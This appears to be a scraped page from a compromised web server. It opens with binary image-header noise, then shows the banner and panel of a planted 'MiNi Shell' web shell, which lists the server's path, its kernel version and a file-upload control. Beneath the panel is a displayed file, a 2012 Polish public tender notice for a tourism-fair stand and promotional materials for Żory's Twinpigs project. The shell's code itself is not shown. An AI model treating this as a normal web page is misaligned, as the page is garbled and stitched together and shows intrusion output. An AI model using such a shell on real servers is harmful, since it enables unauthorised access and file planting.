JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120220/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120220/50644-N-2012.html

<p class="kh_header"><b>Żory: Usługa zaprojektowania, wykonania, dostawy, montażu oraz demontażu zabudowy stoiska targowego o powierzchni 49 m2 wraz z jego wyposażeniem oraz kompleksową obsługą w czasie trwania XVIII Międzynarodowych Targów Turystyki, Sprzętu Turystycznego, Żeglarskiego i Sportowego w Katowicach w dniach od 30 marca do 1 kwietnia 2012 roku oraz na XVII Targach Turystyki i Wypoczynku LATO w Warszawie w dniach od 20 do 22 kwietnia 2012 roku. Zakup i dostawa materiałów promujących Miasteczko Westernowe w ramach projektu pod nazwą Welcome to Twinpigs City - promocja regionalnego produktu turystycznego.</b><br>
<b>Numer ogłoszenia: 50644 - 2012; data zamieszczenia: 20.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nowe Miasto Sp z o.o. , ul. Boczna 6, 44-240 Żory, woj. śląskie, tel. 32 73 40 345, faks 32 73 40 345.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowemiasto.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zaprojektowania, wykonania, dostawy, montażu oraz demontażu zabudowy stoiska targowego o powierzchni 49 m2 wraz z jego wyposażeniem oraz kompleksową obsługą w czasie trwania XVIII Międzynarodowych Targów Turystyki, Sprzętu Turystycznego, Żeglarskiego i Sportowego w Katowicach w dniach od 30 marca do 1 kwietnia 2012 roku oraz na XVII Targach Turystyki i Wypoczynku LATO w Warszawie w dniach od 20 do 22 kwietnia 2012 roku. Zakup i dostawa materiałów promujących Miasteczko Westernowe w ramach projektu pod nazwą Welcome to Twinpigs City - promocja regionalnego produktu turystycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
1) Usługa zaprojektowania, wykonania, dostawy, montażu oraz demontażu zabudowy stoiska targowego o powierzchni 36 m2 wraz z jego wyposażeniem oraz kompleksową obsługą w czasie trwania XVIII Międzynarodowych Targów Turystyki, Sprzętu Turystycznego, Żeglarskiego i Sportowego w Katowicach w dniach od 30 marca do 1 kwietnia 2012 roku oraz na XVII Targach Turystyki i Wypoczynku LATO w Warszawie w dniach od 20 do 22 kwietnia 2012 roku.
2.Zakup i dostawa materiałów promujących Miasteczko Westernowe w ramach projektu pod nazwą Welcome to Twinpigs City - promocja regionalnego produktu turystycznego zlokalizowanego w Żorach współfinansowanego przez Unię Europejską z Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Śląskiego na lata 2007-2013 

Szczegółowy wykaz prac leżących w gestii Wykonawcy związanych z wykonaniem projektu stoiska:
1.Wykonanie 3 różnych (bez powtarzania elementów) szczegółowych projektów architektoniczno-graficznych stoiska typu wyspa (uwzględniając zmiany i korekty, jakie mogą się pojawić w trakcie przygotowań do targów) i przedstawienie Zamawiającemu do zaakceptowania.
2.Wykonanie kompletnej technicznej dokumentacji stoiska
3.Wszelkie kwestie plastyczne i aranżacyjne (np. dobór zdjęć i fotogramów, wykonanie kolaży (tj. kompozycji z różnych materiałów i tworzyw) umieszczenie logo-znaków i napisów na fryzach).
4.Wszelkie projekty wyjściowe, a także wszystkie pozostałe wersje winny być wykonane techniką komputerową w kolorze.
5.Projektant będzie także zobowiązany do wykonania i przedstawienia Zamawiającemu do akceptacji rzutów przestrzennych stoiska prezentującego jego ogólny wygląd. 

Stoisko powinno odpowiadać standardom wystawienniczym, a także zostać zaprojektowane w taki sposób, aby umożliwiało właściwą ekspozycje walorów Miasteczka Westernowego Twinpigs promowanego przez Spółkę. Stoisko powinno uwzględniać rozmiary powierzchni targowej wynajętej przez Zamawiającego (wymiary 7m x 7m).

Wystrój i wyposażenie stoiska - założenia techniczne i elementy obowiązkowe:
1.Lada ze schowkiem, przeznaczona do dystrybucji napojów.
2.4 lady informacyjne o wymiarach ok. 100X50
3.6 sztuki stojaków na ulotki i foldery w formacie A4.
4.2 nowoczesne ekrany plazmowe lub LCD (o wymiarach, co najmniej 42), celem prezentacji filmów promocyjnych.
5.Miejsce do spotkań dla wystawców i gości (3 stoły konferencyjne o wym. ok 80x80 cm każdy z 4 krzesłami)
6.Szafka na foldery - zamykana.
7.Zlewozmywak (wraz z termą i podłączeniem)
8.Szatnia (szafa ubraniowa) z wieszakami na ubrania wierzchnie dla Wystawcy.
9.Oświetlenie stosowne do zaprojektowanego wystroju.
10.Wykładzina dywanowa w kolorze dopasowanym do kolorystyki stoiska. 
11.Wydruki wielkoformatowe w pełnym kolorze, umieszczone w widocznym miejscu stoiska.
12.Wszystkie napisy muszą być wyraźne i czytelne, umieszczone na odpowiedniej wysokości widocznej dla odwiedzającego, a także wykonane uniwersalną czcionka i kolorem.
13.Projekt stoiska powinien zawierać obowiązkowe logotypy Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.
14.Wykonawca zobowiązany jest wykonać niezbędne przyłącza (elektryczne), ustawienie mebli oraz wyposażenie stoiska wystawienniczego w tzw. elementy dekoracyjne.
15.Wykonawca zobowiązany jest przewieźć oraz rozładować na wyznaczone miejsca materiały promocyjne otrzymane od zamawiającego w stanie nienaruszonym i zgodnym z przekazanym opisem ilościowym i asortymentowym. 
16.Wykonawca zobowiązany jest uwzględnić warunki techniczne wskazane przez organizatorów targów: 
XVIII Międzynarodowych Targów Turystyki, Sprzętu Turystycznego, Żeglarskiego i Sportowego w Katowicach zamieszczone przez organizatora targów na jego stronie internetowej: www.glob.fairexpo.pl
XVII Targach Turystyki i Wypoczynku LATO w Warszawie na jego stronie internetowej: www.targilato.pl




Szczegółowy wykaz prac leżących w gestii Wykonawcy związanych z wykonaniem stoiska i jego transportem:
1.Wykonanie wszystkich elementów stoiska zgodnie z projektem.
2.Wykonanie zabudowy stanowiska typu wyspa zgodnie z projektem architektonicznym i graficznym, najpóźniej jeden dzień przed rozpoczęciem targów. 
3.Wyposażenie stoiska w elementy wymienione w niniejszej specyfikacji i projekcie
4.Wykonanie grafiki, napisów na fryzach i znaków wystawców na stoisku, zgodnie
z projektem.
5.Zapewnienie i pokrycie kosztów podłączenia energii elektrycznej (15kW) oraz nadzór nad jej sprawnym funkcjonowaniem.
6.Wyposażenie stoiska w czajnik, ekspres do kawy, naczynia oraz kosze na śmieci.
7.Aranżacja stoiska zgodnie z projektem.
8.Nadzór techniczny stoiska podczas jego eksploatacji.
9.Transport eksponatów, elementów zabudowy, wyposażenia i aranżacji stoiska.
10.Transport materiałów promocyjnych.

Szczegółowy wykaz zadań w zakresie kompleksowej obsługi targów w Warszawie:
Wykonawca zobowiązany będzie dopełnić wszelkich formalności związanych z podróżą, zakwaterowaniem i wyżywieniem 4 osób:
a.zapewnienia i pokrycia kosztów transportu 4 osób samochodem z klimatyzacją oraz wydzielonymi fotelami na trasie: z Żor do Warszawy (do miejsca zakwaterowania) w dniu 19 kwietnia 2012 r. oraz z Warszawy (z miejsca zakwaterowania) do Żor w dniu 22 kwietnia 2012 r.
b.zapewnienia i pokrycia kosztów zakwaterowania dla 4 osób w Warszawie (3 noclegi w tym: pierwszy nocleg z 19-go na 20-go kwietnia 2012 r. drugi z 20 - go na 21-go kwietnia, trzeci z 21-go na 22-go kwietnia 2012 r.) w hotelu kategorii co najmniej trzy gwiazdkowym, zlokalizowanym nie dalej niż 30 minut środkami komunikacji publicznej od miejsca organizowania imprezy targowej, w pokojach jednoosobowych z łazienkami. Wykonawca przed zarezerwowaniem miejsca zakwaterowania przedstawi zamawiającemu, - co najmniej dwa hotele, które spełniają opisane powyżej wymagania do akceptacji.
c.Wykonawca zapewni i pokryje koszty wyżywienia dla 4 osób w hotelu (śniadania i obiadokolacje).
d.Wykonawca zobowiązany jest zawrzeć umowę ubezpieczenia dla 4 osób, które będą reprezentować Zamawiającego na targach. Ubezpieczenie musi obejmować odpowiedzialność od następstw nieszczęśliwych wypadków oraz odpowiedzialność cywilną w czasie podróży tam i z powrotem jak również podczas całego okresu pobytu. Polisę ubezpieczeniową Wykonawca przekaże zamawiającemu nie później niż 29 marca 2012 r - przed rozpoczęciem podróży.

Informacje dodatkowe:
1.Wykonawca zapewnia codzienne sprzątanie stoiska w trakcie i  po zamknięciu stoiska dla zwiedzających.
2.W gestii Wykonawcy leży demontaż stoiska.

Szczegółowy wykaz prac leżących w gestii Wykonawcy związanych z produkcją i dostarczeniem materiałów promocyjnych:
1.Zamawiający wymaga, aby materiały promocyjne były dobrej jakości, charakteryzowały się estetyką, elegancją oraz starannością wykonania.
2.Wykonawca zobowiązuję się do przygotowania projektu umieszczania wymaganych oznaczeń (logo, logotypy oraz opis w postaci Projekt współfinansowany przez Unię Europejską  z Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO WSL 2007-2013).
3.Wszystkie materiały promocyjne z wymaganymi oznaczeniami według zaakceptowanych wcześniej projektów przez Zamawiającego należy dostarczyć na koszt i ryzyko Wykonawcy do siedziby spółki Nowe Miasto Sp. z o.o. , ul. Boczna 6, 44-240 Żory.	

Szczegółowy opis materiałów promocyjnych:
Przedmiotem zamówienia są dostawy materiałów promocyjnych określonych i opisanych szczegółowo w poniższym wykazie.

L.P.	Nazwa artykułu	Ilość	Opis
1	Foldery	5 000 szt.	Folder - A4 pełen kolor okładka dwustronny wydruk kolorowy na papierze kredowym 250 g/m2(+/- 5%) wierzch foliowany. Środek 12 stron dwustronny wydruk kolorowy (pełen kolor) na papierze kredowym 170 g/m2 (+/- 5%). Wykończenie szycie zeszytowe. Pakowanie: zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość). 
2	Maskotki	3 000 szt.	Maskotka kojarząca się z Dzikim Zachodem - materiał niecka welur wypełnienie kuleczki silikonowe typ o-wata wysokości od 15 cm do 20 cm z trwale umieszczonym logotypem. Dodatkowo do maskotki powinna być doszyta metka z dwustronnym nadrukiem: (1 strona) logotyp regionalnego produktu turystycznego z hasłem i odwołaniem do strony internetowej,(2 strona) zestaw logotypów Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013 oraz hasło informujące o źródle finansowania.
Wykonawca zobowiązuje się do przedstawienia 3 rodzajów, z których zamawiający wybierze 1. Pakowane pojedynczo w worek foliowy zgrzewany a następnie zbiorczo z opisem zawartości (rodzaj materiału promocyjnego oraz ilość).
3	Kubki	3 000 szt.	Kubek ceramiczny: pojemność 300 ml u dołu zwężany. Wykonawca zobowiązuje się do przedstawienia 3 rodzajów, z których zamawiający wybierze 1. Na wybranym kubku wykonawca wykona monochromatyczne logo wraz z odnośnikiem o źródle finansowania. Zamawiający zobowiązuje się przekazać materiał merytoryczny oraz ilustracje do opracowania projektu. 
Pakowanie: zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość)
4	Smycze	7 000 szt.	Smycze - z tworzywa sztucznego, miękkiego materiału z karabińczykiem i nadrukiem obustronnym o szerokości 15mm. Wykonawca przedstawi dwa rodzaje smyczy, z których zamawiający wybierze jeden. Na wybranej smyczy wykonawca wykona logotyp wraz z odnośnikiem o źródle finansowania. Zamawiający zobowiązuje się przekazać materiał merytoryczny oraz ilustracje do opracowania projektu. Pakowanie: zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość)
5	Ulotki	5 000 szt.	Ulotka- A5 pełen kolor, dwustronna papier kreda błysk 170 g/m2 (+/- 5%). Pakowanie: zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość)
6	Długopisy	5 000 szt.	Długopis - jednokolorowy plastikowy (wciskany i wyciskany) z wkładem niebieskim wyposażony w metalowy klips. Wykonawca zobowiązuje się przedstawić 2 rodzaje, z czego zamawiający wybierze 1. Na wybranym długopisie na korpusie z prawej strony klipu wykonawca wykona logotyp wraz z odnośnikiem o źródle finansowania. Zamawiający zobowiązuje się przekazać materiał merytoryczny oraz ilustracje do opracowania projektu. 
Pakowanie: zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość).
7	Koszulki	1 500 szt.	Koszulka T-shirt - Koszulka T-shirt 4 wersje kolorystyczne, z czego zamawiający wybierze 2, o gramaturze nie mniejszej niż 180g/m2, 100 % bawełny, ściągacz wokół szyi, podwójne szwy przy rękawach i u dołu koszulki. Rozmiary koszulek od M do XL (w ilościach uzgodnionych z Zamawiającym)
Nadruk: monochromatyczne logo wraz z odnośnikiem o źródle finansowania z przodu koszulki o wymiarze, co najmniej 20x20cm (w zależności od rozmiaru koszulki); projekt i skład dostarcza Wykonawca do akceptacji Zamawiającego.
Pakowane w folie po jednej sztuce, a następnie zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości 
Część I - 1 000 (jeden tysiąc złotych)
Część II - 1 500 (jeden tysiąc pięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykonał usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj. 
co najmniej 1 usługę w zakresie organizacji stoiska na targach o wartości usługi nie mniejszej niż 40 000 zł brutto, z podaniem wartości, przedmiotu i dat wykonania, odbiorców oraz załączeniem dokumentu potwierdzającego, że ta usługa została wykonana należycie - w przypadku gdy Wykonawca składa ofertę na część I
oraz
co najmniej 1 usługę w zakresie dostawy materiałów promocyjnych o wartości zadania nie mniejszej niż 40 000 zł brutto z podaniem ich wartości, przedmiotu i dat wykonania, odbiorców oraz załączeniem dokumentu potwierdzającego, że ta usługa została wykonana należycie - w przypadku gdy Wykonawca składa ofertę na część II</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia lub inny dokument potwierdzający ten fakt (jeżeli Wykonawca polega na zasobach innych  podmiotów)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowemiasto.zory.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nowe Miasto Sp. z o.o.
ul. Boczna 6 pok. 211 (II p)
44-240 Żory.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2012 godzina 10:00, miejsce: Nowe Miasto Sp. z o.o.
ul. Boczna 6 pok. 211 (II p)
44-240 Żory.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pod nazwą Welcome to Twinpigs City - promocja regionalnego produktu turystycznego zlokalizowanego w Żorach współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Śląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.Usługa zaprojektowania, wykonania, dostawy, montażu oraz demontażu zabudowy stoiska targowego o powierzchni 49 m2 wraz z jego wyposażeniem oraz kompleksową obsługą w czasie trwania XVIII Międzynarodowych Targów Turystyki, Sprzętu Turystycznego, Żeglarskiego i Sportowego w Katowicach w dniach od 30 marca do 1 kwietnia 2012 roku oraz na XVII Targach Turystyki i Wypoczynku LATO w Warszawie w dniach od 20 do 22 kwietnia 2012 roku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy wykaz prac leżących w gestii Wykonawcy związanych z wykonaniem projektu stoiska:
1.Wykonanie 3 różnych (bez powtarzania elementów) szczegółowych projektów architektoniczno-graficznych stoiska typu wyspa (uwzględniając zmiany i korekty, jakie mogą się pojawić w trakcie przygotowań do targów) i przedstawienie Zamawiającemu do zaakceptowania.
2.Wykonanie kompletnej technicznej dokumentacji stoiska
3.Wszelkie kwestie plastyczne i aranżacyjne (np. dobór zdjęć i fotogramów, wykonanie kolaży (tj. kompozycji z różnych materiałów i tworzyw) umieszczenie logo-znaków i napisów na fryzach).
